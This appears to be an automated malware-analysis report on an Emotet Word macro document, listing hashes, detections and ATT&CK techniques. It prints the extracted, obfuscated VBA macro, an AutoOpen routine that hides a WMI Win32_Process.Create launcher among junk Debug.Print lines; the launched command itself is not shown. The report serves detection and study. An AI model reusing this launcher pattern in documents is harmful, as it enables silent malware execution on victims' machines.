Emotet — Office (OLE) malware analysis

Static analysis result for SHA-256 881de36d5db96db3…

MALICIOUS

Office (OLE)

132.4 KB Created: 2019-05-29 13:20:00 Authoring application: Microsoft Office Word First seen: 2020-07-02
MD5: 5b6a74d8059a01eb19cd271651fe712e SHA-1: 37326ffa253fc898f21b2ec046b0b7dac515ec54 SHA-256: 881de36d5db96db30346d64af168541010cc560dde2ba835eee9d3f94ae5ebb3
250 Risk Score

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1105 Ingress Tool Transfer T1059 Command and Scripting Interpreter

The sample is identified as malicious by ClamAV with the signature Doc.Downloader.Emotet-10001946-0. Critical heuristics indicate the presence of VBA macros that use CreateObject and WMI (Win32_Process.Create) to launch processes, a common technique for downloading and executing further stages. The autoopen macro suggests an immediate execution upon opening the document.

Heuristics 8

  • ClamAV: Doc.Downloader.Emotet-10001946-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Emotet-10001946-0
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA WMI Win32_Process launcher critical OLE_VBA_WMI_PROCESS_CREATE
    VBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
    Matched line in script
    Debug.Print "lOcCUaC" + ("371" + ("GZVh4tn") + "CsEvVE59" + "914") + "zD1iDEO" + ("p3UCU9vw") + ("Vh4Bovod" + "WcHnLYDk" + "796" + ("Z3OFLXCb") + ("FpLU3G" + ("oZlHwW") + "344" + ("739") + ("z5LA177q" + ("654"))))
CreateObject(("winmg" _
+ "mts:Win" + _
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Debug.Print "lOcCUaC" + ("371" + ("GZVh4tn") + "CsEvVE59" + "914") + "zD1iDEO" + ("p3UCU9vw") + ("Vh4Bovod" + "WcHnLYDk" + "796" + ("Z3OFLXCb") + ("FpLU3G" + ("oZlHwW") + "344" + ("739") + ("z5LA177q" + ("654"))))
CreateObject(("winmg" _
+ "mts:Win" + _
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub _
autoopen( _
)
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 5995 bytes
SHA-256: 5d4cad9fe770ba36aad5b61e7a93eb5e917f83422f8111410630cbae9b5a9ae1
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "mSRp5U, 0, 0, MSForms, ComboBox"
Attribute VB_Control = "TDDAinJ, 1, 1, MSForms, ComboBox"
Attribute VB_Control = "kmi5rho, 2, 2, MSForms, ComboBox"
Sub _
autoopen( _
)
   'Debug.Print "J2NdVb" + ("401" + ("ZFaBLIHE") + "JGuaIb" + "480") + "rRrrS4QF" + ("wYfuLp") + ("L1zaI3" + "zcaEB2A" + "580" + ("qYHI7Dm") + ("pqWjwuZ" + ("AaIz7p5") + "804" + ("668") + ("GY7ij2" + ("19"))))
Debug.Print "vvwQT_" + ("964" + ("hVnmZj1h") + "YPHYLsc" + "407") + "C7siKrPn" + ("wrQ6BFi") + ("Sp02jc2z" + "c3kNv2s" + "628" + ("lTNpijz") + ("SGJ7bZ" + ("EJBT54") + "8" + ("321") + ("YfEUdaE" + ("254"))))
zQoAY9
   'Debug.Print "tXYb_4p" + ("77" + ("nC6Wvrf") + "VG8nh2Vo" + "429") + "nivKO_D5" + ("NoPOMQz") + ("M8Ajkb8" + "ioOOKOqN" + "286" + ("nnlsGK") + ("VVkjA3qw" + ("ItSQNT") + "225" + ("371") + ("Bi00Bjw" + ("620"))))
Debug.Print "Va_QUj" + ("9" + ("Tfa7LH") + "ZaSiuJ0p" + "869") + "bfDCccm" + ("B8rSIJo_") + ("o3_qTMC" + "NAlcJZjt" + "308" + ("YkWSwjtA") + ("a_DQkuh" + ("rZo8itbi") + "540" + ("889") + ("RinINfr" + ("883"))))
End Sub


Attribute VB_Name = "ZwnVj8f"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "iWVonii"

Attribute VB_Name = "mL1BzLs"

Attribute VB_Name = "RaEc_4X"

Attribute VB_Name = "YzuOl2cL"

Attribute VB_Name = "HXA_3V"

Attribute VB_Name = "oKGSVX"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "NNEuOcz"
Function zQoAY9()
   'Debug.Print "tIWEIH" + ("689" + ("LCBJPOW") + "k94Ecajj" + "875") + "zwX2uEaz" + ("Rz4uV7i0") + ("uVi9DV" + "wjjP7uoc" + "669" + ("JzkSGWI") + ("Ff0lFs7" + ("VwYRt2") + "845" + ("303") + ("HG4QXilP" + ("328"))))
Debug.Print "i6Vckbl" + ("961" + ("qBOPWC") + "lcwQP2" + "234") + "iDfdlj" + ("uCzJaPV8") + ("DoABjqJ" + "hUqiOWM" + "8" + ("mNcbad_") + ("PMcUjjKk" + ("bzU_0Jf") + "215" + ("555") + ("LPbS8ImN" + ("591"))))
k6S9Oijw = ThisDocument.TDDAinJ + ThisDocument.kmi5rho + ThisDocument.mSRp5U
   'Debug.Print "DDNcJ9" + ("504" + ("UWaXlSh") + "VJ20I3J" + "977") + "Yad9u7" + ("ZHwhl_") + ("sYq4QXN" + "GOF6VS" + "181" + ("FG7Zqca") + ("ph4j30" + ("nSrwGN") + "893" + ("702") + ("DJJ1nIK4" + ("908"))))
Debug.Print "lOcCUaC" + ("371" + ("GZVh4tn") + "CsEvVE59" + "914") + "zD1iDEO" + ("p3UCU9vw") + ("Vh4Bovod" + "WcHnLYDk" + "796" + ("Z3OFLXCb") + ("FpLU3G" + ("oZlHwW") + "344" + ("739") + ("z5LA177q" + ("654"))))
CreateObject(("winmg" _
+ "mts:Win" + _
"32_Process")).Create# k6S9Oijw, fCtpUw8, nBhMkp, OAYAEN
   'Debug.Print "MnzmVFD" + ("536" + ("i9tqXAK") + "dGha2_IY" + "495") + "j89Wiwt" + ("H6KDhJ") + ("w5ozSCoi" + "wmNsji" + "251" + ("zWMkRhcp") + ("Y5rDNdlZ" + ("vUzwlvA") + "961" + ("438") + ("pob8ktUW" + ("278"))))
Debug.Print "wmOUSj_" + ("237" + ("Yfzpib") + "bfOTQqP" + "249") + "mRCfjhW" + ("Ocb9MXm") + ("jSCSU1" + "IpWiECd" + "369" + ("B07STV5t") + ("bB8pWF" + ("ib9NvNXr") + "842" + ("976") + ("zlsrkVN" + ("327"))))
End Function


Attribute VB_Name = "fvpzIts"
Function nBhMkp()
   'Debug.Print "JHGz4AY" + ("364" + ("joWJTq") + "jRU6X5" + "459") + "NXihaij" + ("uj7nkY") + ("lt1TwZ" + "GMSQvNWM" + "419" + ("fzQJ2iOz") + ("Cs89LK" + ("Oi0wzSSN") + "348" + ("340") + ("mNcZWZ" + ("470"))))
Debug.Print "ohmjiFfW" + ("298" + ("jVJnB1") + "tnM5HHd1" + "254") + "psK3f9W" + ("Kw3Dzn") + ("DzXjZfr" + "hfZFPPz" + "694" + ("Xdpqqkw") + ("nJGilE" + ("IFYMif6") + "303" + ("855") + ("zjCWAS" + ("72"))))
Set nBhMkp = CreateObject(("winmg" _
+ "mts:Win" + "32_Processstar" _
+ "tup"))
   'Debug.Print "A9H3pb" + ("831" + ("HfNcnsHE") + "wqfUvWC" + "474") + "Jqii8vi" + ("qUAvOU") + ("PAc95Z" + "bfnWjm9w" + "867" + ("zqf3NYB") + ("z7RAfM" + ("dcSRZma") + "254" + ("858") + ("KWM4h3S" + ("485"))))
Debug.Print "Mk3920" + ("598" + ("tU3fOZZ") + "DFmWBfP" + "933") + "mIMs9U" + ("WTiozBOf") + ("s0dHrua" + "tiWt6Nj" + "492" + ("f6L5h03A") + ("iHjS5E" + ("jccSQzd") + "325" + ("74") + ("WQhv1lb" + ("683"))))
With nBhMkp
   'Debug.Print "X5XWWW" + ("451" + ("UZfC2is") + "ZjAtYqDa" + "678") + "tPGVRW" + ("wpaWP4R") + ("M8u8zV" + "ztfsS7qW" + "720" + ("PKvimX") + ("ENw1HW" + ("mWED6D") + "513" + ("281") + ("hntu_jY" + ("134"))))
Debug.Print "ZcIkzG0m" + ("234" + ("SWu8_ob") + "hd3JuW" + "508") + "Mc_V0s" + ("ZOwE5C") + ("PQ_zA4" + "nTAl_2cl" + "626" + ("WX_YBpwJ") + ("JvaHDbG" + ("KXjFlqs") + "691" + ("240") + ("KcfDTsS4" + ("959"))))
. _
ShowWindow = mikjkd7Z + DLm6SZ + whfbNt + qWJNja0 + fBGHNTOa
   'Debug.Print "FdPtfjba" + ("495" + ("JfYSPn") + "iZ8jqW" + "223") + "KdSvdn" + ("JNvff1w") + ("IpZnTH" + "BTJ5kX" + "279" + ("LCpis4") + ("DZPlFjLH" + ("dZq4VU") + "576" + ("446") + ("dl2ivWmu" + ("791"))))
Debug.Print "o3wPttk" + ("932" + ("oFKsVdUr") + "Nj3Qdjw2" + "732") + "Q2vzh3o" + ("Ajjszjq") + ("uSCdqLN" + "nK8tMzh" + "462" + ("vwmqEt9") + ("Id84Ac2p" + ("JkkiU4dp") + "283" + ("313") + ("QSQ2lR" + ("609"))))
End With
   'Debug.Print "jC__16J" + ("657" + ("pFuils9") + "maVpik" + "975") + "LojjPCa" + ("T4V6h7") + ("dROosi" + "D8WXfa3d" + "729" + ("uO1rDK") + ("is15ZEU" + ("KwfGtmLG") + "75" + ("57") + ("B3LFzs7t" + ("587"))))
Debug.Print "I9IPPC8" + ("304" + ("IR88CKn") + "wG5nn2o" + "818") + "VRGBSVI" + ("wDIvdi3") + ("HuhSE_" + "OUfZlOU" + "942" + ("DPpl6k") + ("c2WaEwQa" + ("qGNHz6Ez") + "84" + ("944") + ("qzsawVjh" + ("826"))))
End Function

Open this report in the interactive analyzer, or submit your own file for analysis.